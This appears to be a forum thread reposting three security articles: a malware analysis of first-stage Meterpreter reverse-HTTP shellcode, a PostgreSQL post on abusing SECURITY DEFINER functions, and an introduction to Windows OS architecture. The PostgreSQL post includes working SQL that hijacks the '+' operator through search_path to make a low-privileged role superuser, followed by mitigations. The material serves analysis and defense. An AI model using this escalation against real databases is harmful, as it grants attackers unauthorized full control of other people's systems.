    Following deobfuscation, the output in figure 9 is produced. You can spot several recognisable strings including a web browser user agent, IP address and URL.

    stage_one_shellcode.pngFigure 9 – First stage shellcode.

This is the first stage of shellcode, which PowerShell executes in memory using the delegate function VirtualAlloc. The function call allocates memory with an flAllocationType of 0x3000 (MEM_RESERVE | MEM_COMMIT) and memory protection permissions of PAGE_EXECUTE_READWRITE.

    First stage shellcode analysis

    Emulating the first stage of shellcode in scdbg reveals its functionality (figure 10). A call to LoadLibraryA is used to load the WinINet module into the process space of the calling process, in this case powershell.exe. WinINet is a standard Windows API that is used by software to communicate with resources on the Internet over HTTP and FTP protocols.

Next, a call to InternetOpenA is made to initialise a network connection. This is followed by a call to InternetConnectA, which opens an HTTPS session to a remote server over TCP port 443. Afterwards, HttpOpenRequestA is called to create an HTTP request to retrieve an object from the server (/pwn32.gif?pwnd=true). Since the lpszVerb parameter is null, the request will use the GET method. Several options are then configured using InternetSetOptionA. Finally, the request is sent in the call to HttpSendRequestA. We can see that a custom user agent string was defined, along with a cookie value:

    Cookie: Session 
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko

    The user agent string corresponds to Internet Explorer 11 on Windows 10. Significantly, the user agent string matches the version of Internet Explorer used on the targeted host, which is another indicator of the attacker’s knowledge of the targeted network. By mimicking the user agent string, the network traffic generated by the malware is more likely to blend in with the target organisation’s legitimate traffic.

    scdbg_shellcode.pngFigure 10 – First stage shellcode emulated in scdbg.

Disassembling the shellcode confirms the findings of scdbg. The shellcode begins with typical position independent code (PIC) behaviour by calling function sub_88, whose first instruction is to load the top of the stack into the EBP register. This allows the code to figure out a base address, because the CALL instruction places the address of the next instruction onto the stack (figure 11).

    shellcode_analysis_1.pngFigure 11 – Call to sub_88.

    shellcode_analysis_2.pngFigure 12 – Popping the value at the top of the stack to EBP.

The malware author used stack strings to generate strings on the stack, although they appear to be used sparingly in the shellcode. This is an easy way of creating and using strings in shellcode, while also making the functionality of the shellcode harder to discover using standard string-finding utilities. Figure 13 shows the use of a stack string, which is used as an argument to a Windows API function call.

    Resolving functions is also an important first step for shellcode. Since shellcode doesn’t go through the process of loading as a normal executable, it must resolve function addresses independently. This is often accomplished by using undocumented structures within a process and manually walking the export table of already loaded libraries. In addition, many shellcode authors will avoid using strings to find the functions they need. Instead, they’ll use pre-computed hash values. Their code will then compute the hash value of the library they need functions from and compare the hashes. This is not only a computationally inexpensive way of finding functions, but also complicates analysis as the analyst must correlate the hashes to the functions they represent. Figure 12 demonstrates the use of this technique, in that a seemingly random 4-byte value is pushed onto the stack before the call to EBP. EBP will contain the address of the function responsible for finding the desired function pointers and eventually executing those functions.

    shellcode_analysis_3.pngFigure 13 – Stack strings.
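As an aside, many Metasploit-style payloads derive these pre-computed hashes with a ROR-13 scheme. The sketch below illustrates the idea rather than being a byte-exact reimplementation (the real payload hashes the UTF-16 module name and the ASCII function name together before comparing).

```python
def ror13_hash(name):
    # Rotate the 32-bit accumulator right by 13, then add each byte
    # (including a terminating null), as in common ROR-13 API hashing.
    h = 0
    for c in name.encode() + b"\x00":
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF  # rotate right by 13
        h = (h + c) & 0xFFFFFFFF
    return h

print(hex(ror13_hash("LoadLibraryA")))
```

The shellcode only ever carries these 4-byte values, which is why the analyst has to map hashes back to function names.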

    The call to EBP is the address after the original call instruction. This code begins by obtaining a pointer to the process environment block, or PEB, structure via FS:30h. This structure allows the code to obtain a doubly linked list of all libraries loaded in the process space. Walking this structure allows the code to find the base address of any library, then walk the export table to find function pointers. Therefore, this function is responsible for using the pre-computed hash to find all the functions called throughout the code and will be used repeatedly throughout.

If you are unfamiliar with how shellcode uses the PEB structure and parses the portable executable (PE) file format to find function pointers, it’s worth spending some time analysing this function. However, there is no need to get lost in this function for the purposes of this analysis. Instead, evidence of a non-standard function return can help determine when the function is done and allow an analyst to focus on tracing through the shellcode effectively. In this shellcode there is a non-standard return at the end – a JMP EAX (figure 14).

    shellcode_analysis_4.pngFigure 14 – Non-standard return.

    At this point, the code is going to JMP into whatever function was resolved. You can use this function to help identify the functions called throughout the code.

    windbg.pngFigure 15 – Function to resolve API names.

    Further functions are called through the calls to EBP, with the appropriate arguments being placed on the stack before the call. This shellcode carries out the task of creating an HTTP reverse shell. To do that, it will use many core HTTP functions found within the WinINet library. This is in fact shellcode for the first stage of a Meterpreter reverse HTTP shell payload.[5] The default behavior of a Metasploit reverse shell comes in two stages. The first, analysed above, functions as a downloader which grabs the second stage, which is the Meterpreter payload.

    Functions used in this shellcode:

    • LoadLibrary(WinINet)
    • InternetOpenA
    • InternetConnectA
    • HttpOpenRequestA
    • InternetSetOptionA
    • HttpSendRequestA
    • GetDesktopWindow
    • InternetErrorDlg
    • VirtualAllocStub
    • InternetReadFile

    process_interaction_graph.pngFigure 16 – Process interaction graph as viewed in Bromium Controller.

    high_severity_events.pngFigure 17 – High severity events generated during the life cycle of this threat.

    Mitigation

    Endpoints that are running Bromium are protected from this threat because every user task, such as running an HTA file, is run in its own isolated micro-virtual machine or μVM. When the user closes a μVM, the virtual machine is destroyed along with the malware. The trace of threat data from the attack is recorded and presented in the Bromium Controller, enabling security teams to quickly gain detailed insights into the threats facing their organisations.

    References

    [1] https://zeltser.com/fileless-attacks/
    [2] https://lolbas-project.github.io/
    [3] https://attack.mitre.org/techniques/T1170/
    [4] https://docs.microsoft.com/en-us/previous-versions//ms536471(v=vs.85)
    [5] https://github.com/rapid7/metasploit-framework/wiki/Meterpreter

     

    The post Congratulations, You’ve Won a Meterpreter Shell appeared first on Bromium.

     

    Sursa: https://securityboulevard.com/2019/05/congratulations-youve-won-a-meterpreter-shell/

    • Thanks 1
  19. Abusing SECURITY DEFINER functions


    Posted on 17. May 2019 by Laurenz Albe
    security problems © xkcd.com under the Creative Commons License 2.5

     

    Functions defined as SECURITY DEFINER are a powerful, but dangerous tool in PostgreSQL.

    The documentation warns of the dangers:

    Because a SECURITY DEFINER function is executed with the privileges of the user that owns it, care is needed to ensure that the function cannot be misused. For security, search_path should be set to exclude any schemas writable by untrusted users. This prevents malicious users from creating objects (e.g., tables, functions, and operators) that mask objects intended to be used by the function.

    This article describes such an attack, in the hope to alert people that this is no idle warning.

    What is SECURITY DEFINER good for?

    By default, PostgreSQL functions are defined as SECURITY INVOKER. That means that they are executed with the User ID and security context of the user that calls them. SQL statements executed by such a function run with the same permissions as if the user had executed them directly.

    A SECURITY DEFINER function will run with the User ID and security context of the function owner.

    This can be used to allow a low privileged user to execute an operation that requires high privileges in a controlled fashion: you define a SECURITY DEFINER function owned by a privileged user that executes the operation. The function restricts the operation in the desired way.

    For example, you can allow a user to use COPY TO, but only to a certain directory. The function has to be owned by a superuser (or, from v11 on, by a user with the pg_write_server_files role).

    What is the danger?

    Of course such functions have to be written very carefully to avoid software errors that could be abused.

But even if the code is well-written, there is a danger: unqualified access to database objects from the function (that is, accessing objects without explicitly specifying the schema) can affect objects other than the ones the author of the function intended. This is because the configuration parameter search_path can be modified in a database session. This parameter governs which schemas are searched to locate a database object.

The documentation has an example where search_path is used to have a password checking function inadvertently check a temporary table for passwords.

    You may think you can avoid the danger by using the schema name in each table access, but that is not good enough.

    A harmless (?) SECURITY DEFINER function

    Consider this seemingly harmless example of a SECURITY DEFINER function, that does not control search_path properly:

    CREATE FUNCTION public.harmless(integer) RETURNS integer
       LANGUAGE sql SECURITY DEFINER AS
    'SELECT $1 + 1';

    Let’s assume that this function is owned by a superuser.

    Now this looks pretty safe at first glance: no table or view is used, so nothing can happen, right? Wrong!

    How the “harmless” function can be abused

    The attack depends on two things:

    • There is a schema (public) where the attacker can create objects.
    • PostgreSQL is very extensible, so you can not only create new tables and functions, but also new types and operators (among other things).

    The malicious database user “meany” can simply run the following code:

    /*
     * SQL functions can run several statements, the result of the
     * last one is the function result.
     * The "OPERATOR" syntax is necessary to schema-qualify an operator
     * (you can't just write "$1 pg_catalog.+ $2").
     */
     
    CREATE FUNCTION public.sum(integer, integer) RETURNS integer
       LANGUAGE sql AS
    'ALTER ROLE meany SUPERUSER; SELECT $1 OPERATOR(pg_catalog.+) $2';
     
    CREATE OPERATOR public.+ (
       FUNCTION = public.sum,
       LEFTARG = integer,
       RIGHTARG = integer
    );
     
    /*
     * By default, "pg_catalog" is added to "search_path" in front of
     * the schemas that are specified.
     * We have to put it somewhere else explicitly to change that.
     */
     
    SET search_path = public,pg_catalog;
     
    SELECT public.harmless(41);
     
     harmless
    ----------
           42
    (1 row)
     
    \du meany
     
               List of roles
     Role name | Attributes | Member of
    -----------+------------+-----------
     meany     | Superuser  | {}

    What happened?

    The function executed with superuser permissions. search_path was set to find the (unqualified!) “+” operator in schema public rather than in pg_catalog. So the user-defined function public.sum was executed with superuser privileges and turned the attacker into a superuser.

    If the attacker had called the function public.sum himself (or issued the ALTER ROLE statement), it would have caused a “permission denied” error. But since the SELECT statement inside the function ran with superuser permissions, so did the operator function.

    How can you protect yourself?

    In theory you can schema-qualify everything, including operators, inside the function body, but the risk that you forget a harmless “+” or “=” is just too big. Besides, that would make your code hard to read, which is not good for software quality.

    Therefore, you should take the following measures:

    • As recommended by the documentation, always set search_path on a SECURITY DEFINER function. Apart from the schemas that you need in the function, put pg_temp on the list as the last element.
    • Don’t have any schemas in the database where untrusted users have the CREATE privilege. In particular, remove the default public CREATE privilege from the public schema.
    • Revoke the public EXECUTE privilege on all SECURITY DEFINER functions and grant it only to those users that need it.

    In SQL:

    ALTER FUNCTION harmless(integer)
       SET search_path = pg_catalog,pg_temp;
     
    REVOKE CREATE ON SCHEMA public FROM PUBLIC;
     
    REVOKE EXECUTE ON FUNCTION harmless(integer) FROM PUBLIC;
    Laurenz Albe

    Laurenz Albe is a senior consultant and support engineer at Cybertec. He has been working with and contributing to PostgreSQL for 13 years.

     

    Sursa: https://www.cybertec-postgresql.com/en/abusing-security-definer-functions/

    • Upvote 1
  20. Understanding Windows OS Architecture – Theory

    windbg4.png

    Hi Everyone,

In this blog, we will try to understand the Windows OS architecture. To perform debugging operations, you must understand binaries/executables/processes. To understand binaries/executables/processes, you must understand the OS architecture.

Unlike *nix, Windows is a very complex piece of software. This is due to the fact that Microsoft developed various different components (such as COM+, OLE, PowerShell, etc.) communicating with each other via WinAPIs and similar mechanisms. Considering this, covering everything in one single blog post is not a good idea.

To keep this blogpost concise, we will cover the basic components (such as processes and threads). Then we will see the big picture. Other Microsoft technologies (such as .NET, Azure, etc.) won’t be covered in this blogpost. As the name suggests, this blog will be all theory. It may become boring, but please, bear with me!!!

Now, to explain all these things in detail, I’ll be using multiple resources. I’ll put all of those in the reference section at the end.

As the scope is clear, we are ready to dive into the Windows OS architecture.

    Building blocks of Windows OS:

• Process: A process represents a running instance of an executable. A process manages/owns the things listed below.
  • Executable binary: Contains the initial code and data executed within the process.
  • Private virtual address space: Used to allocate memory for code within the process on an as-needed basis.
  • Primary token: This object stores details about the default security context of the process and is referenced by the threads within the process.
  • Private handle table: Table used for managing executive objects such as events, semaphores and files.
  • Thread(s) for process execution

    Processes are identified by a unique process ID. This ID remains constant for as long as the corresponding kernel process object exists. It is important to note that every running instance of the same binary gets its own process and process ID.

    All of the above is summed up in the following diagram.

    [Figure: Windows Process Structure]
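    The point that every running instance of the same binary gets its own process and process ID is easy to observe from any language. Here is a small, portable Python sketch that launches two instances of the same binary (the Python interpreter itself, standing in for any executable) and compares the PIDs:

    ```python
    import subprocess
    import sys

    # Spawn two instances of the same binary (here, the Python interpreter)
    # and have each one print the process ID it was given.
    procs = [
        subprocess.Popen(
            [sys.executable, "-c", "import os; print(os.getpid())"],
            stdout=subprocess.PIPE,
        )
        for _ in range(2)
    ]
    pids = [int(p.communicate()[0].decode()) for p in procs]
    print(pids)
    assert pids[0] != pids[1]  # each instance is a separate process with its own ID
    ```

    On Windows the same experiment could be done by starting notepad.exe twice and comparing the PIDs in Task Manager.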
    • Virtual Memory: The OS provides a separate private, linear, virtual address space to every process. This space is used by the process to allocate memory for executables, threads, DLLs, etc. The size of this address space depends on how many bits the process supports, i.e. 32 or 64: 2^bits gives the total available virtual address space.

    For a 32-bit process on 32-bit Windows, it is 4GB (2GB for system space + 2GB for user space). This split can be shifted to 1GB system + 3GB user if the process is marked with the LARGEADDRESSAWARE linker flag when the program is compiled in Visual Studio. For a 32-bit process on 64-bit Windows, the user-space limit goes up to 4GB with the same LARGEADDRESSAWARE flag. For a 64-bit process on Windows 10 64-bit (our target system), it is 128TB system space + 128TB user space.

    [Figure: Address space layout, 32-bit process on 32-bit Windows OS]
    [Figure: Address space layout, 64-bit process on 64-bit Windows OS]

    The reason this memory scheme is called virtual is that a virtual address is not directly related to a physical address (i.e. an actual location in RAM and/or storage). Virtual-to-physical mapping is done by the memory manager. We will explore this in much more detail in the next blogpost.
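    As a quick sanity check on the 2^bits rule and the 128TB + 128TB figure (which follows from the 48-bit canonical addresses that current x64 Windows actually uses, rather than the full 64 bits), the arithmetic works out as:

    ```python
    # Illustrative arithmetic for the 2^bits rule above (plain sizes, no API).
    GB = 2**30
    TB = 2**40

    # 32-bit process: 2^32 addressable bytes = 4 GB in total,
    # split 2 GB user / 2 GB system by default.
    assert 2**32 == 4 * GB

    # Current x64 Windows uses 48-bit canonical addresses:
    # 2^48 bytes = 256 TB in total, split 128 TB user / 128 TB system.
    assert 2**48 == 2 * 128 * TB

    print(2**32 // GB, "GB total (32-bit);", 2**48 // TB, "TB total (64-bit)")
    ```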

    • Threads: Threads execute code. As we saw earlier, a thread is an object owned by a process, and it uses the resources available to the process to perform its tasks. A thread owns the following information:
      • Current access mode (user or kernel)
      • Execution context, e.g. the state of registers, page status, etc.
      • One or two stacks, for local variable allocation and call management
      • A Thread Local Storage array, a data structure for per-thread data
      • Base and current priority
      • Processor affinity

    A thread is in one of three states:

    1. Running: Currently executing code on a processor
    2. Ready: Waiting for a busy or unavailable processor to become available for execution
    3. Waiting: Waiting for some event to occur. After the event, the thread changes state to Ready.

    We will explore this in the next blogpost with a practical example.
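    The Running/Waiting/Ready cycle can be sketched in a few lines of portable Python. The thread below runs, blocks on an event (Waiting), and goes back to Ready and then Running once the event fires; the OS-level state names are Windows', but the mechanics are the same everywhere:

    ```python
    import threading
    import time

    event = threading.Event()
    log = []

    def worker():
        log.append("running")  # Running: executing code on a processor
        event.wait()           # Waiting: blocked until some event occurs
        log.append("resumed")  # event fired -> Ready -> scheduled -> Running

    t = threading.Thread(target=worker)
    t.start()
    time.sleep(0.1)            # give the worker time to reach its Waiting state
    event.set()                # the event occurs; the worker becomes Ready
    t.join()
    print(log)  # ['running', 'resumed']
    ```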

    • System Calls: A system call is a piece of functionality shared between the various subsystems. The WinAPI and the NTAPI contain such system calls. We will explore this in much more detail in the next blog with a practical example; it is important, because we will need it when looking closely at the programming tutorials.

    Generalized OS Architecture:

    [Figure: Windows OS Architecture]

    Even though the diagram above is labelled "Windows Architecture", it is only an approximate, simplified architecture, because Microsoft has never revealed the actual one. But don't worry: the diagram is from the Windows Internals book, which is an official Microsoft publication. Let's try to understand each component one by one.

    1. Environment subsystems and subsystem DLLs: An environment subsystem is the interface between applications and some of the Windows executive system services. A subsystem does this with the help of DLLs. An example is the Windows subsystem, where kernel32.dll, advapi32.dll, user32.dll, etc. implement the Windows API functions. We will explore the Windows subsystem in depth in future blog posts.
    2. NTDLL.dll: ntdll.dll is a special system support library, primarily for use by subsystem DLLs and native applications. It provides two types of functions:
      • System service dispatch stubs for Windows executive system services: These functions provide the user-mode interface to system services; for example, the NtCreateFile stub reached when Notepad opens a file. Many of these functions are accessible via the WinAPI. We will explore this in the next blogpost with a practical example.
      • Internal support functions used by subsystems, subsystem DLLs, and other native images
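    A small, hedged sketch of this layering: CreateFileW and NtCreateFile are real exports of kernel32.dll and ntdll.dll respectively, and ctypes can resolve both by name, showing the subsystem DLL and the native support library as two distinct modules. The platform guard is only there to keep the script runnable on non-Windows machines; the interesting branch requires Windows.

    ```python
    import ctypes
    import sys

    # On Windows, a documented WinAPI call such as CreateFileW lives in a
    # subsystem DLL (kernel32.dll), while the NtCreateFile dispatch stub that
    # actually traps into the kernel lives in ntdll.dll.
    resolved = []
    if sys.platform == "win32":
        kernel32 = ctypes.WinDLL("kernel32")  # subsystem DLL (Windows API layer)
        ntdll = ctypes.WinDLL("ntdll")        # native support library below it
        for name, dll in (("CreateFileW", kernel32), ("NtCreateFile", ntdll)):
            addr = ctypes.cast(getattr(dll, name), ctypes.c_void_p).value
            resolved.append(name)
            print(f"{name} at {hex(addr)}")
    else:
        print("skipped: Windows-only demonstration")
    ```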
    3. Windows Executive Layer: This is the second-lowest layer, sitting on top of the kernel (inside NTOSKRNL.exe). It has the following components:
      • Configuration manager: Implements and manages the system registry.
      • Process manager: Creates and terminates processes and threads, working with the Windows kernel to perform these activities.
      • Security Reference Monitor: Enforces security policies on the local computer. It guards OS resources, performing run-time object protection and auditing.
      • I/O manager: Implements device-independent I/O and is responsible for dispatching requests to the appropriate device drivers for further processing.
      • Plug-and-Play manager: Determines which driver is appropriate for a device and loads it.
      • Power manager: With the help of processor power management and the power management framework, coordinates power events and generates power-management I/O notifications to device drivers.
      • Windows Driver Model (WDM) Windows Management Instrumentation (WMI) routines: These routines enable device drivers to publish performance and configuration information, and receive commands from the user-mode WMI service.
      • Memory manager: Implements virtual memory and provides support to the underlying cache manager. We will explore this in detail in future blogposts.
      • Advanced LPC (ALPC) facility: Passes messages between a client process and a server process on the same computer. It is also used as the local transport for RPC.
      • Run-time library functions: These include string processing, arithmetic operations, data-type conversion, and security-structure processing.
      • Executive support routines: Include system memory allocation (paged and non-paged pool), interlocked memory access, and special types of synchronization mechanisms.
    4. Kernel: The kernel provides some fundamental mechanisms, such as thread scheduling and synchronization services, used by the Windows executive layer, as well as low-level, hardware-architecture-dependent support such as interrupt and exception dispatching. The kernel is written in C, with some instructions in assembly. To keep things simple at the low level, the kernel implements simple "kernel objects", which in turn support the executive objects. For example, control objects define how OS functions are controlled, while dispatcher objects provide the synchronization capabilities used in thread scheduling. We will (and must) explore the kernel in depth when we look into driver development.

    Conclusion:

    I have not covered everything in this post, and cannot cover the entire architecture in this humble blogpost. But I believe I have covered enough detail to give a basic understanding of the Windows architecture and move ahead with this journey. In the next blogpost, we will use tools such as WinDBG and the Sysinternals tools to dive into the Windows architecture. Till then, Auf Wiedersehen!!!!

    References:

    1. The building blocks of the OS are adapted from Windows Kernel Programming by Pavel Yosifovich (@zodiacon)
    2. The generalized Windows architecture is adapted from Windows Internals, Part 1 (7th edition)

    SLAER


    I am a guy in infosec who knows the bits and bytes of one thing and another. I like to fiddle with many things, and one of them is computers.

     

    Sursa: https://scriptdotsh.com/index.php/2019/05/13/winarch-theory/
